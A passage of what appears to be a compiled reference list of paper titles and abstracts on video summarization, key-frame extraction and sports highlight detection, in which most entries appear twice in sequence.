existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Highlight sound effects detection in audio stream paper_content: This paper addresses the problem of highlight sound effects detection in audio stream, which is very useful in fields of video summarization and highlight extraction. Unlike researches on audio segmentation and classification, in this domain, it just locates those highlight sound effects in audio stream. An extensible framework is proposed and in current system three sound effects are considered: laughter, applause and cheer, which are tied up with highlight events in entertainments, sports, meetings and home videos. HMMs are used to model these sound effects and a log-likelihood scores based method is used to make final decision. A sound effect attention model is also proposed to extend general audio attention model for highlight extraction and video summarization. Evaluations on a 2-hours audio database showed very encouraging results. --- paper_title: Classification of self-consumable highlights for soccer video summaries paper_content: An effective scheme for soccer summarization is significant to improve the usage of this massively growing video data. The paper presents an extension to our recent work which proposed a framework to integrate highlights into play-breaks to construct more complete soccer summaries. The current focus is to demonstrate the benefits of detecting some specific audio-visual features during play-break sequences in order to classify highlights contained within them. The main purpose is to generate summaries which are self-consumable individually. To support this framework, the algorithms for shot classification and detection of near-goal and slow-motion replay scenes is described. The results of our experiment using 5 soccer videos (20 minutes each) show the performance and reliability of our framework --- paper_title: Augmented segmentation and visualization for presentation videos paper_content: We investigate methods of segmenting, visualizing, and indexing presentation videos by both audio and visual data. The audio track is segmented by speaker, and augmented with key phrases which are extracted using an Automatic Speech Recognizer (ASR). The video track is segmented by visual dissimilarities and changes in speaker gesturing, and augmented by representative key frames. An interactive user interface combines a visual representation of audio, video, text, key frames, and allows the user to navigate presentation videos. User studies with 176 students of varying knowledge were conducted on 7.5 hours of student presentation video (32 presentations). Tasks included searching for various portions of presentations, both known and unknown to students, and summarizing presentations given the annotations. The results are favorable towards the video summaries and the interface, suggesting faster responses by a factor of 20% compared to having access to the actual video. Accuracy of responses remained the same on average. Follow-up surveys present a number of suggestions towards improving the interface, such as the incorporation of automatic speaker clustering and identification, and the display of an abstract topological view of the presentation. Surveys also show alternative contexts in which students would like to use the tool in the classroom environment. --- paper_title: A fast layout algorithm for visual video summaries paper_content: We created an improved layout algorithm for automatically generating visual video summaries reminiscent of comic book pages. The summaries are comprised of images from the video that are sized according to their importance. The algorithm performs a global optimization with respect to a layout cost function that encompasses features such as the number of resized images and the amount of whitespace in the presentation. The algorithm creates summaries that: always fit exactly into the requested area, are varied by containing few rows with images of the same size, and have little whitespace at the end of the last row. The layout algorithm is fast enough to allow the interactive resizing of the summaries and the subsequent generation of a new layout. --- paper_title: Spatio-temporal quality assessment for home videos paper_content: Compared with the video programs taken by professionals, home videos are always with low-quality content resulted from lack of professional capture skills. In this paper, we present a novel spatio-temporal quality assessment scheme in terms of low-level content features for home videos. In contrast to existing frame-level-based quality assessment approaches, a type of temporal segment of video, sub-shot, is selected as the basic unit for quality assessment. A set of spatio-temporal artifacts, regarded as the key factors affecting the overall perceived quality (i.e. unstableness, jerkiness, infidelity, blurring, brightness and orientation), are mined from each sub-shot based on the particular characteristics of home videos. The relationship between the overall quality metric and these factors are exploited by three different methods, including user study, factor fusion, and a learning-based scheme. To validate the proposed scheme, we present a scalable quality-based home video summarization system, aiming at achieving the best quality while simultaneously preserving the most informative content. A comparison user study between this system and the attention model based video skimming approach demonstrated the effectiveness of the proposed quality assessment scheme. --- paper_title: Video summarization by spatial-temporal graph optimization paper_content: In this paper we present a novel approach for video summarization based on graph optimization. Our approach emphasizes both a comprehensive visual-temporal content coverage and visual coherence of the video summary. The approach has three stages. First, the source video is segmented into video shots, and a candidate shot set is selected from the video shots according to some video features. Second, a dissimilarity function is defined between the video shots to describe their spatial-temporal relation, and the candidate video shot set is modelled into a directional graph. Third, we outline a dynamic programming algorithm and use it to search the longest path in the graph as the final video skimming. A static video summary is generated at the same time. Experimental results show encouraging promises of our approach for video summarization. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content . The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appealing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Dynamic storyboards for video content summarization paper_content: We propose an innovative, general purpose, approach to the selection and hierarchical representation of key frames of a video sequence for video summarization. In the first stage the shot detection module performs the video structural analysis; in the second stage the key frame extraction module creates the visual summary; and the last stage the summary post-processing module, after a pre-a classification aimed remove meaningless key frames, create a multilevel storyboard that the user may browse. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular for a large volume storage device for video/audio content data and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: Flashlight and player detection in fighting sport for video summarization paper_content: In this paper, we present a method for generating fighting sport videos summary highlights using flashlight [N. Benjamas et al., May 2005] and player detection by detecting frames that contain close-up flashlight and players. Detected flashlight and distance between players is utilized in efficient summarization of fighting sport videos. The proposed algorithm first player was detected using skin color detection and connected component labeling. Then, the algorithm identifies the correct frame by calculating the distance between players that distance between one player and another one. Our algorithm accurately detects distance between players that it has the ability to capture inherently important events. --- paper_title: A utility framework for the automatic generation of audio-visual skims paper_content: In this paper, we present a novel algorithm for generating audio-visual skims from computable scenes. Skims are useful for browsing digital libraries, and for on-demand summaries in set-top boxes. A computable scene is a chunk of data that exhibits consistencies with respect to chromaticity, lighting and sound. There are three key aspects to our approach: (a) visual complexity and grammar, (b) robust audio segmentation and (c) an utility model for skim generation. We define a measure of visual complexity of a shot, and map complexity to the minimum time for comprehending the shot. Then, we analyze the underlying visual grammar, since it makes the shot sequence meaningful. We segment the audio data into four classes, and then detect significant phrases in the speech segments. The utility functions are defined in terms of complexity and duration of the segment. The target skim is created using a general constrained utility maximization procedure that maximizes the information content and the coherence of the resulting skim. The objective function is constrained due to multimedia synchronization constraints, visual syntax and by penalty functions on audio and video segments. The user study results indicate that the optimal skims show statistically significant differences with other skims with compression rates up to 90%. --- paper_title: Adaptive extraction of highlights from a sport video based on excitement modeling paper_content: This paper addresses the challenge of automatically extracting the highlights from sports TV broadcasts. In particular, we are interested in finding a generic method of highlights extraction, which does not require the development of models for the events that are thought to be interpreted by the users as highlights. Instead, we search for highlights in those video segments that are expected to excite the users most. It is namely realistic to assume that a highlighting event induces a steady increase in a user's excitement, as compared to other, less interesting events. We mimic the expected variations in a user's excitement by observing the temporal behavior of selected audiovisual low-level features and the editing scheme of a video. Relations between this noncontent information and the evoked excitement are drawn partly from psychophysiological research and partly from analyzing the live-video directing practice. The expected variations in a user's excitement are represented by the excitement time curve, which is, subsequently, filtered in an adaptive way to extract the highlights in the prespecified total length and in view of the preferences regarding the highlights strength: extraction can namely be performed with variable sensitivity to capture few "strong" highlights or more "less strong" ones. We evaluate and discuss the performance of our method on the case study of soccer TV broadcasts. --- paper_title: Semantic units detection and summarization of baseball videos paper_content: A framework for analyzing baseball videos and generation of game summary is proposed. Due to the well-defined rules of baseball games, the system efficiently detects semantic units by the domain-related knowledge, and therefore, automatically discovers the structure of a baseball game. After extracting the information changes that are caused by some semantic events on the superimposed caption, a rule-based decision tree is applied to detect meaningful events. Only three types of information, including number-of-outs, score, and base occupation status, are taken in the detection process, and thus the framework detects events and produces summarization in an efficient and effective manner. The experimental results show the effectiveness of this framework and some research opportunities about generating semantic-level summary for sports videos. --- paper_title: Information theory-based shot cut/fade detection and video summarization paper_content: New methods for detecting shot boundaries in video sequences and for extracting key frames using metrics based on information theory are proposed. The method for shot boundary detection relies on the mutual information (MI) and the joint entropy (JE) between the frames. It can detect cuts, fade-ins and fade-outs. The detection technique was tested on the TRECVID2003 video test set having different types of shots and containing significant object and camera motion inside the shots. It is demonstrated that the method detects both fades and abrupt cuts with high accuracy. The information theory measure provides us with better results because it exploits the inter-frame information in a more compact way than frame subtraction. It was also successfully compared to other methods published in literature. The method for key frame extraction uses MI as well. We show that it captures satisfactorily the visual content of the shot. --- paper_title: Creating audio keywords for event detection in soccer video paper_content: This paper presents a novel framework called audio keywords to assist event detection in soccer video. Audio keyword is a middle-level representation that can bridge the gap between low-level features and high-level semantics. Audio keywords are created from low-level audio features by using support vector machine learning. The created audio keywords can be used to detect semantic events in soccer video by applying a heuristic mapping. Experiments of audio keywords creation and event detection based on audio keywords have illustrated promising results. According to the experimental results, we believe that audio keyword is an effective representation that is able to achieve more intuitionistic result for event detection in sports video compared with the method of event detection directly based on low-level features. --- paper_title: Automatically generating summaries for musical video paper_content: In this paper, we propose a novel approach to automatically summarize musical videos. The proposed summarization scheme is different from the current methods used for video summarization. The musical video is separated into the musical and visual tracks. A music summary is created by analyzing the music content based on music features, adaptive clustering algorithm and musical domain knowledge. Then, shots are detected and clustered in the visual track. Finally, the music video summary is created by aligning the music summary and clustered video shots. Subjective studies by experienced users have been conducted to evaluate the quality of summarization. The experiments on different genres of musical video and comparisons with the summaries only based on music track and video track indicate that the results of summarization using proposed method are significant and effective to help realize user's expectation. --- paper_title: Event detection in baseball video using superimposed caption recognition paper_content: We have developed a novel system for baseball video event detection and summarization using superimposed caption text detection and recognition. The system detects different types of semantic level events in baseball video including scoring and last pitch of each batter. The system has two components: event detection and event boundary detection. Event detection is realized by change detection and recognition of game stat texts (such as text information showing in score box). Event boundary detection is achieved using our previously developed algorithm, which detects the pitch view as the event beginning and nonactive view as potential endings of the event. One unique contribution of the system is its capability to accurately detect the semantic level events by combining video text recognition with camera view recognition. Another unique feature is the real-time processing speed by taking advantage of compressed-domain approaches in part of the algorithms such as caption detection. To the best of our knowledge, this is the first system achieving accurate detection of multiple types of high-level semantic events in baseball videos. --- paper_title: An approach to generating two-level video abstraction paper_content: Video abstraction is a short summary of the content of a longer video document. Most existing video abstraction methods are based on shot-level, which is not sufficient to meaningful browsing and is too fine to users sometimes. In this paper, we propose a novel approach of generating video abstraction at two levels, namely, the shot-level and the scene-level. We put up a method of extracting key frames from shots, according to the content variation of the latter. An updated time-adaptive algorithm is used to group the shots into scene and representative frames are extracted in the region of that scene using the method of generating Minimum Spanning Tree. Key frames and representative frames can represent the content of shots and scenes, respectively. The organized sequences of key frames and representative frames are the two-level video abstraction. Experiments based on real-world movies show that the method above can provide users with better video summary at different levels. --- paper_title: Summarization of news video and its description for content‐based access paper_content: A video summary abstracts the entirety with the gist without losing the essential content of the original video and also facilitates efficient content-based access to the desired content. In this article, we propose a novel method for summarizing a news video based on multimodal analysis of the content. The proposed method exploits the closed caption (CC) data to locate semantically meaningful highlights in a news video and speech signals in an audio stream to align the CC data with the video in a time-line. Then, the extracted highlights are described in a multilevel structure using the MPEG-7 Summarization Description Scheme (DS). Specifically, we use the HierarchicalSummary DS that allows efficient accessing of the content through such functionalities as multilevel abstracts and navigation guidance in a hierarchical fashion. Intensive experiments with our prototypical systems are presented to demonstrate the validity and reliability of the proposed method in real applications. © 2004 Wiley Periodicals, Inc. Int J Imaging Syst Technol 13, 267–274, 2003; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/ima.10067 --- paper_title: Narrative abstraction model for story-oriented video paper_content: TV program review services, especially drama review services, are one of the most popular video on demand services on the Web. In this paper, we propose a novel video abstraction model for a review service of story-oriented video such as dramas. In a drama review service, viewers want to understand the story in a short time and service providers want to provide video abstracts at minimum cost. The proposed model enables the automatic creation of a video abstract that still allows viewers to understand the overall story of the source video. Also, the model has a flexible structure so that the duration of an abstract can be adjusted depending on the requirements given by viewers. We get clues for human understanding of a story from scenario writing rules and editorial techniques which are popularly used in the process of video producing. We have implemented the proposed model and successfully applied it to several TV dramas. --- paper_title: Automatically extracting highlights for TV Baseball programs paper_content: In today's fast-paced world, while the number of channels of television programming available is increasing rapidly, the time available to watch them remains the same or is decreasing. Users desire the capability to watch the programs time-shifted (on-demand) and/or to watch just the highlights to save time. In this paper we explore how to provide for the latter capability, that is the ability to extract highlights automatically, so that viewing time can be reduced. We focus on the sport of baseball as our initial target—it is a very popular sport, the whole game is quite long, and the exciting portions are few. We focus on detecting highlights using audio-track features alone without relying on expensive-to-compute video-track features. We use a combination of generic sports features and baseball-specific features to obtain our results, but believe that may other sports offer the same opportunity and that the techniques presented here will apply to those sports. We present details on relative performance of various learning algorithms, and a probabilistic framework for combining multiple sources of information. We present results comparing output of our algorithms against human-selected highlights for a diverse collection of baseball games with very encouraging results. --- paper_title: Sequential association mining for video summarization paper_content: In this paper, we propose an association-based video summarization scheme that mines sequential associations from video data for summary creation. Given detected shots of video V, we first cluster them into visually distinct groups, and then construct a sequential sequence by integrating the temporal order and cluster type of each shot. An association mining scheme is designed to mine sequentially associated clusters from the sequence, and these clusters are selected as summary candidates. With a user specified summary length, our system generates the corresponding summary by selecting representative frames from candidate clusters and assembling them by their original temporal order. The experimental evaluation demonstrates the effectiveness of our summarization method. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: VSUM: summarizing from videos paper_content: Summarization on produced type of video data (like news or movies) is to find important segments that contain rich information. Users could obtain the important messages by reading summaries rather than full documents. The research in this area could be divided into two parts: (I) image processing (IP) perspective, and (2) NLP (nature language processing) perspective. The former put emphasis on the detection of key frames, while the later focused on the extraction of important concepts. This paper proposes a video summarization system, VSUM. VSUM first identifies all caption words, and then adopts a technique to find the important segments. An external thesaurus is also used in VSUM to enhance the summary extraction process. The experimental results show that VSUM could perform well even if the accuracy of OCR (optical character recognition) is not sophisticating. --- paper_title: Video summarization and scene detection by graph modeling paper_content: We propose a unified approach for video summarization based on the analysis of video structures and video highlights. Two major components in our approach are scene modeling and highlight detection. Scene modeling is achieved by normalized cut algorithm and temporal graph analysis, while highlight detection is accomplished by motion attention modeling. In our proposed approach, a video is represented as a complete undirected graph and the normalized cut algorithm is carried out to globally and optimally partition the graph into video clusters. The resulting clusters form a directed temporal graph and a shortest path algorithm is proposed to efficiently detect video scenes. The attention values are then computed and attached to the scenes, clusters, shots, and subshots in a temporal graph. As a result, the temporal graph can inherently describe the evolution and perceptual importance of a video. In our application, video summaries that emphasize both content balance and perceptual quality can be generated directly from a temporal graph that embeds both the structure and attention information. --- paper_title: Low cost soccer video summaries based on visual rhythm paper_content: The visual rhythm is a spatio-temporal sampled representation of video data providing compact information while preserving several types of video events.We exploit these properties in the present work to propose two new low level descriptors for the analysis of soccer videos computed directly from the visual rhythm.The descriptors are related to dominant color and camera motion estimation.The new descriptors are applied in different tasks aiming the analysis of soccer videos such as shot transition detection, shot classification and attack direction estimation.We also present a simple automated soccer summary application to illustrate the use of the new descriptors. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge are encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: MINMAX optimal video summarization paper_content: The need for video summarization originates primarily from a viewing time constraint. A shorter version of the original video sequence is desirable in a number of applications. Clearly, a shorter version is also necessary in applications where storage, communication bandwidth and/or power are limited. In this paper, our work is based on a MINMAX optimization formulation with viewing time, frame skip and bit rate constraints. New metrics for missing frame and video summary distortions are introduced. Optimal algorithm based on dynamic programming is presented along with experimental results. --- paper_title: Video skimming and characterization through the combination of image and language understanding paper_content: Digital video is rapidly becoming important for education, entertainment and a host of multimedia applications. With the size of the video collections growing to thousands of hours, technology is needed to effectively browse segments in a short time without losing the content of the video. We propose a method to extract the significant audio and video information and create a skim video which represents a very short synopsis of the original. The goal of this work is to show the utility of integrating language and image understanding techniques for video skimming by extraction of significant information, such as specific objects, audio keywords and relevant video structure. The resulting skim video is much shorter; where compaction is as high as 20:1, and yet retains the essential content of the original segment. We have conducted a user-study to test the content summarization and effectiveness of the skim as a browsing tool. --- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Highlight sound effects detection in audio stream paper_content: This paper addresses the problem of highlight sound effects detection in audio stream, which is very useful in fields of video summarization and highlight extraction. Unlike researches on audio segmentation and classification, in this domain, it just locates those highlight sound effects in audio stream. An extensible framework is proposed and in current system three sound effects are considered: laughter, applause and cheer, which are tied up with highlight events in entertainments, sports, meetings and home videos. HMMs are used to model these sound effects and a log-likelihood scores based method is used to make final decision. A sound effect attention model is also proposed to extend general audio attention model for highlight extraction and video summarization. Evaluations on a 2-hours audio database showed very encouraging results. --- paper_title: Classification of self-consumable highlights for soccer video summaries paper_content: An effective scheme for soccer summarization is significant to improve the usage of this massively growing video data. The paper presents an extension to our recent work which proposed a framework to integrate highlights into play-breaks to construct more complete soccer summaries. The current focus is to demonstrate the benefits of detecting some specific audio-visual features during play-break sequences in order to classify highlights contained within them. The main purpose is to generate summaries which are self-consumable individually. To support this framework, the algorithms for shot classification and detection of near-goal and slow-motion replay scenes is described. The results of our experiment using 5 soccer videos (20 minutes each) show the performance and reliability of our framework --- paper_title: Augmented segmentation and visualization for presentation videos paper_content: We investigate methods of segmenting, visualizing, and indexing presentation videos by both audio and visual data. The audio track is segmented by speaker, and augmented with key phrases which are extracted using an Automatic Speech Recognizer (ASR). The video track is segmented by visual dissimilarities and changes in speaker gesturing, and augmented by representative key frames. An interactive user interface combines a visual representation of audio, video, text, key frames, and allows the user to navigate presentation videos. User studies with 176 students of varying knowledge were conducted on 7.5 hours of student presentation video (32 presentations). Tasks included searching for various portions of presentations, both known and unknown to students, and summarizing presentations given the annotations. The results are favorable towards the video summaries and the interface, suggesting faster responses by a factor of 20% compared to having access to the actual video. Accuracy of responses remained the same on average. Follow-up surveys present a number of suggestions towards improving the interface, such as the incorporation of automatic speaker clustering and identification, and the display of an abstract topological view of the presentation. Surveys also show alternative contexts in which students would like to use the tool in the classroom environment. --- paper_title: A fast layout algorithm for visual video summaries paper_content: We created an improved layout algorithm for automatically generating visual video summaries reminiscent of comic book pages. The summaries are comprised of images from the video that are sized according to their importance. The algorithm performs a global optimization with respect to a layout cost function that encompasses features such as the number of resized images and the amount of whitespace in the presentation. The algorithm creates summaries that: always fit exactly into the requested area, are varied by containing few rows with images of the same size, and have little whitespace at the end of the last row. The layout algorithm is fast enough to allow the interactive resizing of the summaries and the subsequent generation of a new layout. --- paper_title: Spatio-temporal quality assessment for home videos paper_content: Compared with the video programs taken by professionals, home videos are always with low-quality content resulted from lack of professional capture skills. In this paper, we present a novel spatio-temporal quality assessment scheme in terms of low-level content features for home videos. In contrast to existing frame-level-based quality assessment approaches, a type of temporal segment of video, sub-shot, is selected as the basic unit for quality assessment. A set of spatio-temporal artifacts, regarded as the key factors affecting the overall perceived quality (i.e. unstableness, jerkiness, infidelity, blurring, brightness and orientation), are mined from each sub-shot based on the particular characteristics of home videos. The relationship between the overall quality metric and these factors are exploited by three different methods, including user study, factor fusion, and a learning-based scheme. To validate the proposed scheme, we present a scalable quality-based home video summarization system, aiming at achieving the best quality while simultaneously preserving the most informative content. A comparison user study between this system and the attention model based video skimming approach demonstrated the effectiveness of the proposed quality assessment scheme. --- paper_title: Video summarization by spatial-temporal graph optimization paper_content: In this paper we present a novel approach for video summarization based on graph optimization. Our approach emphasizes both a comprehensive visual-temporal content coverage and visual coherence of the video summary. The approach has three stages. First, the source video is segmented into video shots, and a candidate shot set is selected from the video shots according to some video features. Second, a dissimilarity function is defined between the video shots to describe their spatial-temporal relation, and the candidate video shot set is modelled into a directional graph. Third, we outline a dynamic programming algorithm and use it to search the longest path in the graph as the final video skimming. A static video summary is generated at the same time. Experimental results show encouraging promises of our approach for video summarization. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content . The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appealing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Dynamic storyboards for video content summarization paper_content: We propose an innovative, general purpose, approach to the selection and hierarchical representation of key frames of a video sequence for video summarization. In the first stage the shot detection module performs the video structural analysis; in the second stage the key frame extraction module creates the visual summary; and the last stage the summary post-processing module, after a pre-a classification aimed remove meaningless key frames, create a multilevel storyboard that the user may browse. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular for a large volume storage device for video/audio content data and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: Flashlight and player detection in fighting sport for video summarization paper_content: In this paper, we present a method for generating fighting sport videos summary highlights using flashlight [N. Benjamas et al., May 2005] and player detection by detecting frames that contain close-up flashlight and players. Detected flashlight and distance between players is utilized in efficient summarization of fighting sport videos. The proposed algorithm first player was detected using skin color detection and connected component labeling. Then, the algorithm identifies the correct frame by calculating the distance between players that distance between one player and another one. Our algorithm accurately detects distance between players that it has the ability to capture inherently important events. --- paper_title: A utility framework for the automatic generation of audio-visual skims paper_content: In this paper, we present a novel algorithm for generating audio-visual skims from computable scenes. Skims are useful for browsing digital libraries, and for on-demand summaries in set-top boxes. A computable scene is a chunk of data that exhibits consistencies with respect to chromaticity, lighting and sound. There are three key aspects to our approach: (a) visual complexity and grammar, (b) robust audio segmentation and (c) an utility model for skim generation. We define a measure of visual complexity of a shot, and map complexity to the minimum time for comprehending the shot. Then, we analyze the underlying visual grammar, since it makes the shot sequence meaningful. We segment the audio data into four classes, and then detect significant phrases in the speech segments. The utility functions are defined in terms of complexity and duration of the segment. The target skim is created using a general constrained utility maximization procedure that maximizes the information content and the coherence of the resulting skim. The objective function is constrained due to multimedia synchronization constraints, visual syntax and by penalty functions on audio and video segments. The user study results indicate that the optimal skims show statistically significant differences with other skims with compression rates up to 90%. --- paper_title: Adaptive extraction of highlights from a sport video based on excitement modeling paper_content: This paper addresses the challenge of automatically extracting the highlights from sports TV broadcasts. In particular, we are interested in finding a generic method of highlights extraction, which does not require the development of models for the events that are thought to be interpreted by the users as highlights. Instead, we search for highlights in those video segments that are expected to excite the users most. It is namely realistic to assume that a highlighting event induces a steady increase in a user's excitement, as compared to other, less interesting events. We mimic the expected variations in a user's excitement by observing the temporal behavior of selected audiovisual low-level features and the editing scheme of a video. Relations between this noncontent information and the evoked excitement are drawn partly from psychophysiological research and partly from analyzing the live-video directing practice. The expected variations in a user's excitement are represented by the excitement time curve, which is, subsequently, filtered in an adaptive way to extract the highlights in the prespecified total length and in view of the preferences regarding the highlights strength: extraction can namely be performed with variable sensitivity 